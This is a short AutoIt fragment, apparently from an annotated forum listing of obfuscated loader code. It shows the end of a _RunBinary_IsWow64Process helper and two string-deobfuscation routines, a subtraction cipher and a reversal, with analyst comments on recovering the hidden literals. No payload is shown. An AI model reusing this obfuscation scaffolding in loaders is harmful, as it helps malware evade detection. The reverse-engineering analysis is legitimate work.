If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; Failure
Return $J3134[2]
EndFunc ;==>_RunBinary_IsWow64Process
Func ShiftOneLove($O333431 = "", $M333432 = 1)
	; String decoder used by the obfuscated listing.
	; $O333431 - "|"-separated decimal character codes
	; $M333432 - amount subtracted from every code before conversion (default 1)
	; Returns the concatenation of Chr(code - $M333432) for each code, in order.
	; Analyst note: this is a plain per-string subtraction cipher, so every
	; obfuscated literal in the file can be recovered statically by reversing the
	; literal and subtracting the shift given at the call site.
	Local $aCodes = StringSplit($O333431, "|")
	Local $sPlain = ""
	Local $iIdx = 1
	; Element [0] of the StringSplit result holds the number of pieces
	While $iIdx <= $aCodes[0]
		$sPlain = $sPlain & Chr($aCodes[$iIdx] - $M333432)
		$iIdx += 1
	WEnd
	Return $sPlain
EndFunc
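Func Revers($O333431)
	; Returns $O333431 with its characters in reverse order.
	; In this listing it is applied to the "|"-separated code strings before they
	; are handed to ShiftOneLove, so both the digits of each code and the order of
	; the codes are flipped back.
	; Fixes over the posted version: the accumulator is initialised explicitly, and
	; the loop stops at position 1 instead of running one extra pass that asked
	; StringMid for position 0 and relied on it yielding an empty string.
	Local $sOut = ""
	For $iPos = StringLen($O333431) To 1 Step -1
		$sOut &= StringMid($O333431, $iPos, 1)
	Next
	Return $sOut
EndFunc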